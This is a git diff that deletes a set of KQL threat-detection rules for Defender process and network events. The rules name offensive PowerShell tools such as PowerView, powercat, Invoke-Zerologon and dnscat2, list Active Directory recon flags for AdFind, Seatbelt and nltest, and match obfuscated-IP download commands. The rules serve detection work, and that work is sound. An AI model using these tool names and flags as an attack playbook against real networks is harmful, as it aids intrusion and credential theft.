ProcessCommandLine contains "Invoke-Tater" or ProcessCommandLine contains "Invoke-Thunderfox" or ProcessCommandLine contains "Invoke-ThunderStruck" or ProcessCommandLine contains "Invoke-TokenManipulation" or ProcessCommandLine contains "Invoke-Tokenvator" or ProcessCommandLine contains "Invoke-TotalExec" or ProcessCommandLine contains "Invoke-UrbanBishop" or ProcessCommandLine contains "Invoke-UserHunter" or ProcessCommandLine contains "Invoke-VoiceTroll" or ProcessCommandLine contains "Invoke-Whisker" or ProcessCommandLine contains "Invoke-WinEnum" or ProcessCommandLine contains "Invoke-winPEAS" or ProcessCommandLine contains "Invoke-WireTap" or ProcessCommandLine contains "Invoke-WmiCommand" or ProcessCommandLine contains "Invoke-WMIExec" or ProcessCommandLine contains "Invoke-WScriptBypassUAC" or ProcessCommandLine contains "Invoke-Zerologon" or ProcessCommandLine contains "MailRaider" or ProcessCommandLine contains "New-ADIDNSNode" or ProcessCommandLine contains "New-DNSRecordArray" or ProcessCommandLine contains "New-HoneyHash" or ProcessCommandLine contains "New-InMemoryModule" or ProcessCommandLine contains "New-MachineAccount" or ProcessCommandLine contains "New-SOASerialNumberArray" or ProcessCommandLine contains "Out-Minidump" or ProcessCommandLine contains "Port-Scan" or ProcessCommandLine contains "PowerBreach" or ProcessCommandLine contains "powercat " or ProcessCommandLine contains "PowerUp" or ProcessCommandLine contains "PowerView" or ProcessCommandLine contains "Remove-ADIDNSNode" or ProcessCommandLine contains "Remove-MachineAccount" or ProcessCommandLine contains "Remove-Update" or ProcessCommandLine contains "Rename-ADIDNSNode" or ProcessCommandLine contains "Revoke-ADIDNSPermission" or ProcessCommandLine contains "Set-ADIDNSNode" or ProcessCommandLine contains "Set-MacAttribute" or ProcessCommandLine contains "Set-MachineAccountAttribute" or ProcessCommandLine contains "Set-Wallpaper" or ProcessCommandLine contains "Show-TargetScreen" or 
ProcessCommandLine contains "Start-CaptureServer" or ProcessCommandLine contains "Start-Dnscat2" or ProcessCommandLine contains "Start-WebcamRecorder" or ProcessCommandLine contains "VolumeShadowCopyTools"
\ No newline at end of file
diff --git a/Discovery/Network_Reconnaissance_Activity.kql b/Discovery/Network_Reconnaissance_Activity.kql
deleted file mode 100644
index 511409c8..00000000
--- a/Discovery/Network_Reconnaissance_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/07
-// Level: high
-// Description: Detects a set of suspicious network related commands often used in recon stages
-// Tags: attack.discovery, attack.t1087, attack.t1082, car.2016-03-001
-DeviceProcessEvents
-| where ProcessCommandLine contains "nslookup" and ProcessCommandLine contains "_ldap._tcp.dc._msdcs."
\ No newline at end of file
diff --git a/Discovery/New_Network_Trace_Capture_Started_Via_Netsh.EXE.kql b/Discovery/New_Network_Trace_Capture_Started_Via_Netsh.EXE.kql
deleted file mode 100644
index fb03775e..00000000
--- a/Discovery/New_Network_Trace_Capture_Started_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Kutepov Anton, oscd.community
-// Date: 2019/10/24
-// Level: medium
-// Description: Detects the execution of netsh with the "trace" flag in order to start a network capture
-// Tags: attack.discovery, attack.credential_access, attack.t1040
-DeviceProcessEvents
-| where (ProcessCommandLine contains "trace" and ProcessCommandLine contains "start") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/Discovery/Nltest.EXE_Execution.kql b/Discovery/Nltest.EXE_Execution.kql
deleted file mode 100644
index fbb98d57..00000000
--- a/Discovery/Nltest.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Arun Chauhan
-// Date: 2023/02/03
-// Level: low
-// Description: Detects nltest commands that can be used for information discovery
-// Tags: attack.discovery, attack.t1016, attack.t1018, attack.t1482
-DeviceProcessEvents
-| where FolderPath endswith "\\nltest.exe" or ProcessVersionInfoOriginalFileName =~ "nltestrk.exe"
\ No newline at end of file
diff --git a/Discovery/Obfuscated_IP_Download_Activity.kql b/Discovery/Obfuscated_IP_Download_Activity.kql
deleted file mode 100644
index 20e6fdaa..00000000
--- a/Discovery/Obfuscated_IP_Download_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2022/08/03
-// Level: medium
-// Description: Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command
-// Tags: attack.discovery
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget " or ProcessCommandLine contains "curl " or ProcessCommandLine contains "DownloadFile" or ProcessCommandLine contains "DownloadString") and ((ProcessCommandLine contains " 0x" or ProcessCommandLine contains "//0x" or ProcessCommandLine contains ".0x" or ProcessCommandLine contains ".00x") or (ProcessCommandLine contains "http://%" and ProcessCommandLine contains "%2e") or (ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.[0-9]{1,3}\\.0[0-9]{3,4}" or ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.0[0-9]{3,7}" or ProcessCommandLine matches regex "https?://0[0-9]{3,11}" or ProcessCommandLine matches regex "https?://(0[0-9]{1,11}\\.){3}0[0-9]{1,11}" or ProcessCommandLine matches regex "https?://0[0-9]{1,11}" or ProcessCommandLine matches regex " [0-7]{7,13}")) and (not(ProcessCommandLine matches regex "https?://((25[0-5]|(2[0-4]|1\\d|[1-9])?\\d)(\\.|\\b)){4}"))
\ No newline at end of file
diff --git a/Discovery/Obfuscated_IP_Via_CLI.kql b/Discovery/Obfuscated_IP_Via_CLI.kql
deleted file mode 100644
index 43d59e08..00000000
--- a/Discovery/Obfuscated_IP_Via_CLI.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2022/08/03
-// Level: medium
-// Description: Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line
-// Tags: attack.discovery
-DeviceProcessEvents
-| where (FolderPath endswith "\\ping.exe" or FolderPath endswith "\\arp.exe") and ((ProcessCommandLine contains " 0x" or ProcessCommandLine contains "//0x" or ProcessCommandLine contains ".0x" or ProcessCommandLine contains ".00x") or (ProcessCommandLine contains "http://%" and ProcessCommandLine contains "%2e") or (ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.[0-9]{1,3}\\.0[0-9]{3,4}" or ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.0[0-9]{3,7}" or ProcessCommandLine matches regex "https?://0[0-9]{3,11}" or ProcessCommandLine matches regex "https?://(0[0-9]{1,11}\\.){3}0[0-9]{1,11}" or ProcessCommandLine matches regex "https?://0[0-9]{1,11}" or ProcessCommandLine matches regex " [0-7]{7,13}")) and (not(ProcessCommandLine matches regex "https?://((25[0-5]|(2[0-4]|1\\d|[1-9])?\\d)(\\.|\\b)){4}"))
\ No newline at end of file
diff --git a/Discovery/PUA_-_AdFind_Suspicious_Execution.kql b/Discovery/PUA_-_AdFind_Suspicious_Execution.kql
deleted file mode 100644
index 665b314e..00000000
--- a/Discovery/PUA_-_AdFind_Suspicious_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community
-// Date: 2021/02/02
-// Level: high
-// Description: Detects AdFind execution with common flags seen used during attacks
-// Tags: attack.discovery, attack.t1018, attack.t1087.002, attack.t1482, attack.t1069.002, stp.1u
-DeviceProcessEvents
-| where ProcessCommandLine contains "domainlist" or ProcessCommandLine contains "trustdmp" or ProcessCommandLine contains "dcmodes" or ProcessCommandLine contains "adinfo" or ProcessCommandLine contains " dclist " or ProcessCommandLine contains "computer_pwdnotreqd" or ProcessCommandLine contains "objectcategory=" or ProcessCommandLine contains "-subnets -f" or ProcessCommandLine contains "name=\"Domain Admins\"" or ProcessCommandLine contains "-sc u:" or ProcessCommandLine contains "domainncs" or ProcessCommandLine contains "dompol" or ProcessCommandLine contains " oudmp " or ProcessCommandLine contains "subnetdmp" or ProcessCommandLine contains "gpodmp" or ProcessCommandLine contains "fspdmp" or ProcessCommandLine contains "users_noexpire" or ProcessCommandLine contains "computers_active" or ProcessCommandLine contains "computers_pwdnotreqd"
\ No newline at end of file
diff --git a/Discovery/PUA_-_Adidnsdump_Execution.kql b/Discovery/PUA_-_Adidnsdump_Execution.kql
deleted file mode 100644
index 18f6a3fc..00000000
--- a/Discovery/PUA_-_Adidnsdump_Execution.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/01/01
-// Level: low
-// Description: This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,
-Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP
-
-// Tags: attack.discovery, attack.t1018
-DeviceProcessEvents
-| where ProcessCommandLine contains "adidnsdump" and FolderPath endswith "\\python.exe"
\ No newline at end of file
diff --git a/Discovery/PUA_-_Advanced_IP_Scanner_Execution.kql b/Discovery/PUA_-_Advanced_IP_Scanner_Execution.kql
deleted file mode 100644
index 0d88a8e3..00000000
--- a/Discovery/PUA_-_Advanced_IP_Scanner_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy
-// Date: 2020/05/12
-// Level: medium
-// Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
-// Tags: attack.discovery, attack.t1046, attack.t1135
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/portable" and ProcessCommandLine contains "/lng") or (FolderPath contains "\\advanced_ip_scanner" or ProcessVersionInfoOriginalFileName contains "advanced_ip_scanner" or ProcessVersionInfoFileDescription contains "Advanced IP Scanner")
\ No newline at end of file
diff --git a/Discovery/PUA_-_Advanced_Port_Scanner_Execution.kql b/Discovery/PUA_-_Advanced_Port_Scanner_Execution.kql
deleted file mode 100644
index 7d57516a..00000000
--- a/Discovery/PUA_-_Advanced_Port_Scanner_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/12/18
-// Level: medium
-// Description: Detects the use of Advanced Port Scanner.
-// Tags: attack.discovery, attack.t1046, attack.t1135
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/portable" and ProcessCommandLine contains "/lng") or (FolderPath contains "\\advanced_port_scanner" or ProcessVersionInfoOriginalFileName contains "advanced_port_scanner" or ProcessVersionInfoFileDescription contains "Advanced Port Scanner")
\ No newline at end of file
diff --git a/Discovery/PUA_-_Crassus_Execution.kql b/Discovery/PUA_-_Crassus_Execution.kql
deleted file mode 100644
index a6d0a8b2..00000000
--- a/Discovery/PUA_-_Crassus_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2023/04/17
-// Level: high
-// Description: Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics.
-// Tags: attack.discovery, attack.t1590.001
-DeviceProcessEvents
-| where FolderPath endswith "\\Crassus.exe" or ProcessVersionInfoOriginalFileName =~ "Crassus.exe" or ProcessVersionInfoFileDescription contains "Crassus"
\ No newline at end of file
diff --git a/Discovery/PUA_-_Seatbelt_Execution.kql b/Discovery/PUA_-_Seatbelt_Execution.kql
deleted file mode 100644
index 4a282d83..00000000
--- a/Discovery/PUA_-_Seatbelt_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/18
-// Level: high
-// Description: Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters
-// Tags: attack.discovery, attack.t1526, attack.t1087, attack.t1083
-DeviceProcessEvents
-| where (FolderPath endswith "\\Seatbelt.exe" or ProcessVersionInfoOriginalFileName =~ "Seatbelt.exe" or ProcessVersionInfoFileDescription =~ "Seatbelt" or (ProcessCommandLine contains " DpapiMasterKeys" or ProcessCommandLine contains " InterestingProcesses" or ProcessCommandLine contains " InterestingFiles" or ProcessCommandLine contains " CertificateThumbprints" or ProcessCommandLine contains " ChromiumBookmarks" or ProcessCommandLine contains " ChromiumHistory" or ProcessCommandLine contains " ChromiumPresence" or ProcessCommandLine contains " CloudCredentials" or ProcessCommandLine contains " CredEnum" or ProcessCommandLine contains " CredGuard" or ProcessCommandLine contains " FirefoxHistory" or ProcessCommandLine contains " ProcessCreationEvents")) or ((ProcessCommandLine contains " -group=misc" or ProcessCommandLine contains " -group=remote" or ProcessCommandLine contains " -group=chromium" or ProcessCommandLine contains " -group=slack" or ProcessCommandLine contains " -group=system" or ProcessCommandLine contains " -group=user" or ProcessCommandLine contains " -group=all") and ProcessCommandLine contains " -outputfile=")
\ No newline at end of file
diff --git a/Discovery/PUA_-_SoftPerfect_Netscan_Execution.kql b/Discovery/PUA_-_SoftPerfect_Netscan_Execution.kql
deleted file mode 100644
index 66385a3e..00000000
--- a/Discovery/PUA_-_SoftPerfect_Netscan_Execution.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: @d4ns4n_ (Wuerth-Phoenix)
-// Date: 2024/04/25
-// Level: medium
-// Description: Detects usage of SoftPerfect's "netscan.exe". An application for scanning networks.
-It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim.
-
-// Tags: attack.discovery, attack.t1046
-DeviceProcessEvents
-| where FolderPath endswith "\\netscan.exe" or ProcessVersionInfoProductName =~ "Network Scanner" or ProcessVersionInfoFileDescription =~ "Application for scanning networks"
\ No newline at end of file
diff --git a/Discovery/PUA_-_Suspicious_ActiveDirectory_Enumeration_Via_AdFind.EXE.kql b/Discovery/PUA_-_Suspicious_ActiveDirectory_Enumeration_Via_AdFind.EXE.kql
deleted file mode 100644
index 14d15c3a..00000000
--- a/Discovery/PUA_-_Suspicious_ActiveDirectory_Enumeration_Via_AdFind.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/13
-// Level: high
-// Description: Detects active directory enumeration activity using known AdFind CLI flags
-// Tags: attack.discovery, attack.t1087.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "-sc admincountdmp" or ProcessCommandLine contains "-sc exchaddresses" or (ProcessCommandLine contains "lockoutduration" or ProcessCommandLine contains "lockoutthreshold" or ProcessCommandLine contains "lockoutobservationwindow" or ProcessCommandLine contains "maxpwdage" or ProcessCommandLine contains "minpwdage" or ProcessCommandLine contains "minpwdlength" or ProcessCommandLine contains "pwdhistorylength" or ProcessCommandLine contains "pwdproperties")
\ No newline at end of file
diff --git a/Discovery/Permission_Check_Via_Accesschk.EXE.kql b/Discovery/Permission_Check_Via_Accesschk.EXE.kql
deleted file mode 100644
index 7b93caa8..00000000
--- a/Discovery/Permission_Check_Via_Accesschk.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/10/13
-// Level: medium
-// Description: Detects the usage of the "Accesschk" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges
-// Tags: attack.discovery, attack.t1069.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "uwcqv " or ProcessCommandLine contains "kwsu " or ProcessCommandLine contains "qwsu " or ProcessCommandLine contains "uwdqs ") and (ProcessVersionInfoProductName endswith "AccessChk" or ProcessVersionInfoFileDescription contains "Reports effective permissions" or (FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\accesschk64.exe") or ProcessVersionInfoOriginalFileName =~ "accesschk.exe")
\ No newline at end of file
diff --git a/Discovery/Potential_Active_Directory_Enumeration_Using_AD_Module_-_ProcCreation.kql b/Discovery/Potential_Active_Directory_Enumeration_Using_AD_Module_-_ProcCreation.kql
deleted file mode 100644
index 3f12168b..00000000
--- a/Discovery/Potential_Active_Directory_Enumeration_Using_AD_Module_-_ProcCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2023/01/22
-// Level: medium
-// Description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration.
-// Tags: attack.reconnaissance, attack.discovery, attack.impact
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo ") and ProcessCommandLine contains "Microsoft.ActiveDirectory.Management.dll" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Discovery/Potential_Configuration_And_Service_Reconnaissance_Via_Reg.EXE.kql b/Discovery/Potential_Configuration_And_Service_Reconnaissance_Via_Reg.EXE.kql
deleted file mode 100644
index d61c3ee0..00000000
--- a/Discovery/Potential_Configuration_And_Service_Reconnaissance_Via_Reg.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community
-// Date: 2019/10/21
-// Level: medium
-// Description: Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.
-// Tags: attack.discovery, attack.t1012, attack.t1007
-DeviceProcessEvents
-| where ProcessCommandLine contains "query" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "currentVersion\\windows" or ProcessCommandLine contains "winlogon\\" or ProcessCommandLine contains "currentVersion\\shellServiceObjectDelayLoad" or ProcessCommandLine contains "currentVersion\\run" or ProcessCommandLine contains "currentVersion\\policies\\explorer\\run" or ProcessCommandLine contains "currentcontrolset\\services")
\ No newline at end of file
diff --git a/Discovery/Potential_Discovery_Activity_Via_Dnscmd.EXE.kql b/Discovery/Potential_Discovery_Activity_Via_Dnscmd.EXE.kql
deleted file mode 100644
index 0f2eb648..00000000
--- a/Discovery/Potential_Discovery_Activity_Via_Dnscmd.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @gott_cyber
-// Date: 2022/07/31
-// Level: medium
-// Description: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.
-// Tags: attack.discovery, attack.execution, attack.t1543.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/enumrecords" or ProcessCommandLine contains "/enumzones" or ProcessCommandLine contains "/ZonePrint" or ProcessCommandLine contains "/info") and FolderPath endswith "\\dnscmd.exe"
\ No newline at end of file
diff --git a/Discovery/Potential_Network_Sniffing_Activity_Using_Network_Tools.kql b/Discovery/Potential_Network_Sniffing_Activity_Using_Network_Tools.kql
deleted file mode 100644
index a9505cd1..00000000
--- a/Discovery/Potential_Network_Sniffing_Activity_Using_Network_Tools.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/21
-// Level: medium
-// Description: Detects potential network sniffing via use of network tools such as "tshark", "windump".
-Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.
-An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
-
-// Tags: attack.credential_access, attack.discovery, attack.t1040
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-i" and FolderPath endswith "\\tshark.exe") or FolderPath endswith "\\windump.exe"
\ No newline at end of file
diff --git a/Discovery/Potential_Recon_Activity_Using_DriverQuery.EXE.kql b/Discovery/Potential_Recon_Activity_Using_DriverQuery.EXE.kql
deleted file mode 100644
index 830e114d..00000000
--- a/Discovery/Potential_Recon_Activity_Using_DriverQuery.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/19
-// Level: high
-// Description: Detect usage of the "driverquery" utility to perform reconnaissance on installed drivers
-// Tags: attack.discovery
-DeviceProcessEvents
-| where (FolderPath endswith "driverquery.exe" or ProcessVersionInfoOriginalFileName =~ "drvqry.exe") and ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\"))
\ No newline at end of file
diff --git a/Discovery/Potential_Recon_Activity_Via_Nltest.EXE.kql b/Discovery/Potential_Recon_Activity_Via_Nltest.EXE.kql
deleted file mode 100644
index 97fbb117..00000000
--- a/Discovery/Potential_Recon_Activity_Via_Nltest.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Craig Young, oscd.community, Georg Lauenstein
-// Date: 2021/07/24
-// Level: medium
-// Description: Detects nltest commands that can be used for information discovery
-// Tags: attack.discovery, attack.t1016, attack.t1482
-DeviceProcessEvents
-| where (FolderPath endswith "\\nltest.exe" or ProcessVersionInfoOriginalFileName =~ "nltestrk.exe") and ((ProcessCommandLine contains "server" and ProcessCommandLine contains "query") or (ProcessCommandLine contains "/user" or ProcessCommandLine contains "all_trusts" or ProcessCommandLine contains "dclist:" or ProcessCommandLine contains "dnsgetdc:" or ProcessCommandLine contains "domain_trusts" or ProcessCommandLine contains "dsgetdc:" or ProcessCommandLine contains "parentdomain" or ProcessCommandLine contains "trusted_domains"))
\ No newline at end of file
diff --git a/Discovery/Potential_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql b/Discovery/Potential_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql
deleted file mode 100644
index 439202c1..00000000
--- a/Discovery/Potential_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: blueteamer8699
-// Date: 2022/01/03
-// Level: medium
-// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
-// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005
-DeviceProcessEvents
-| where ProcessCommandLine contains "gatherNetworkInfo.vbs" and ((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "wscript.exe")))
\ No newline at end of file
diff --git a/Discovery/Potential_Suspicious_Activity_Using_SeCEdit.kql b/Discovery/Potential_Suspicious_Activity_Using_SeCEdit.kql
deleted file mode 100644
index e8d18e0e..00000000
--- a/Discovery/Potential_Suspicious_Activity_Using_SeCEdit.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Janantha Marasinghe
-// Date: 2022/11/18
-// Level: medium
-// Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
-// Tags: attack.discovery, attack.persistence, attack.defense_evasion, attack.credential_access, attack.privilege_escalation, attack.t1562.002, attack.t1547.001, attack.t1505.005, attack.t1556.002, attack.t1562, attack.t1574.007, attack.t1564.002, attack.t1546.008, attack.t1546.007, attack.t1547.014, attack.t1547.010, attack.t1547.002, attack.t1557, attack.t1082
-DeviceProcessEvents
-| where (FolderPath endswith "\\secedit.exe" or ProcessVersionInfoOriginalFileName =~ "SeCEdit") and ((ProcessCommandLine contains "/configure" and ProcessCommandLine contains "/db") or (ProcessCommandLine contains "/export" and ProcessCommandLine contains "/cfg"))
\ No newline at end of file
diff --git a/Discovery/Potentially_Suspicious_EventLog_Recon_Activity_Using_Log_Query_Utilities.kql b/Discovery/Potentially_Suspicious_EventLog_Recon_Activity_Using_Log_Query_Utilities.kql
deleted file mode 100644
index 5a9213f4..00000000
--- a/Discovery/Potentially_Suspicious_EventLog_Recon_Activity_Using_Log_Query_Utilities.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2022/09/09
-// Level: medium
-// Description: Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs.
-This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.
-
-// Tags: attack.credential_access, attack.discovery, attack.t1552
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-InstanceId 4624" or ProcessCommandLine contains "System[EventID=4624]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "4624") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "4624") or ProcessCommandLine contains "-InstanceId 4778" or ProcessCommandLine contains "System[EventID=4778]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "4778") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "4778") or ProcessCommandLine contains "-InstanceId 25" or ProcessCommandLine contains "System[EventID=25]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "25") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "25")) or (ProcessCommandLine contains "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" or ProcessCommandLine contains "Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational" or ProcessCommandLine contains "Security")) and ((ProcessCommandLine contains "Select" and ProcessCommandLine contains "Win32_NTLogEvent") or ((ProcessCommandLine contains " qe " or ProcessCommandLine contains " query-events ") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (ProcessCommandLine contains " ntevent" and (FolderPath endswith "\\wmic.exe"
or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) or (ProcessCommandLine contains "Get-WinEvent " or ProcessCommandLine contains "get-eventlog "))
\ No newline at end of file
diff --git a/Discovery/Python_Initiated_Connection.kql b/Discovery/Python_Initiated_Connection.kql
deleted file mode 100644
index 73ccfb59..00000000
--- a/Discovery/Python_Initiated_Connection.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/10
-// Level: medium
-// Description: Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server.
-// Tags: attack.discovery, attack.t1046
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath contains "python" and (not((RemoteIP =~ "127.0.0.1" and LocalIP =~ "127.0.0.1"))) and (not((((InitiatingProcessCommandLine contains ":\\ProgramData\\Anaconda3\\Scripts\\conda-script.py" and InitiatingProcessCommandLine contains "update") and InitiatingProcessParentFileName =~ "conda.exe") or (InitiatingProcessCommandLine contains "C:\\ProgramData\\Anaconda3\\Scripts\\jupyter-notebook-script.py" and InitiatingProcessParentFileName =~ "python.exe"))))
\ No newline at end of file
diff --git a/Discovery/Recon_Command_Output_Piped_To_Findstr.EXE.kql b/Discovery/Recon_Command_Output_Piped_To_Findstr.EXE.kql
deleted file mode 100644
index 2a95db99..00000000
--- a/Discovery/Recon_Command_Output_Piped_To_Findstr.EXE.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2023/07/06
-// Level: medium
-// Description: Detects the excution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" for example. Attackers often time use this to extract specific information they require in their chain.
-
-// Tags: attack.discovery, attack.t1057
-DeviceProcessEvents
-| where ProcessCommandLine contains "ipconfig /all | find " or ProcessCommandLine contains "ipconfig /all | findstr " or ProcessCommandLine contains "ipconfig | find " or ProcessCommandLine contains "ipconfig | findstr " or ProcessCommandLine contains "ipconfig.exe /all | find " or ProcessCommandLine contains "ipconfig.exe /all | findstr " or ProcessCommandLine contains "ipconfig.exe | find " or ProcessCommandLine contains "ipconfig.exe | findstr " or ProcessCommandLine contains "net start | find" or ProcessCommandLine contains "net start | findstr" or ProcessCommandLine contains "net.exe start | find" or ProcessCommandLine contains "net.exe start | findstr" or ProcessCommandLine contains "net1 start | find" or ProcessCommandLine contains "net1 start | findstr" or ProcessCommandLine contains "net1.exe start | find" or ProcessCommandLine contains "net1.exe start | findstr" or ProcessCommandLine contains "netstat -ano | find" or ProcessCommandLine contains "netstat -ano | findstr" or ProcessCommandLine contains "netstat | find" or ProcessCommandLine contains "netstat | findstr" or ProcessCommandLine contains "netstat.exe -ano | find" or ProcessCommandLine contains "netstat.exe -ano | findstr" or ProcessCommandLine contains "netstat.exe | find" or ProcessCommandLine contains "netstat.exe | findstr" or ProcessCommandLine contains "ping | find" or ProcessCommandLine contains "ping | findstr" or ProcessCommandLine contains "ping.exe | find" or ProcessCommandLine contains "ping.exe | findstr" or
ProcessCommandLine contains "systeminfo | find " or ProcessCommandLine contains "systeminfo | findstr " or ProcessCommandLine contains "systeminfo.exe | find " or ProcessCommandLine contains "systeminfo.exe | findstr " or ProcessCommandLine contains "tasklist | find " or ProcessCommandLine contains "tasklist | findstr " or ProcessCommandLine contains "tasklist.exe | find " or ProcessCommandLine contains "tasklist.exe | findstr " or ProcessCommandLine contains "whoami /all | find " or ProcessCommandLine contains "whoami /all | findstr " or ProcessCommandLine contains "whoami.exe /all | find " or ProcessCommandLine contains "whoami.exe /all | findstr "
\ No newline at end of file
diff --git a/Discovery/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql b/Discovery/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql
deleted file mode 100644
index 6b0bdff3..00000000
--- a/Discovery/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/19
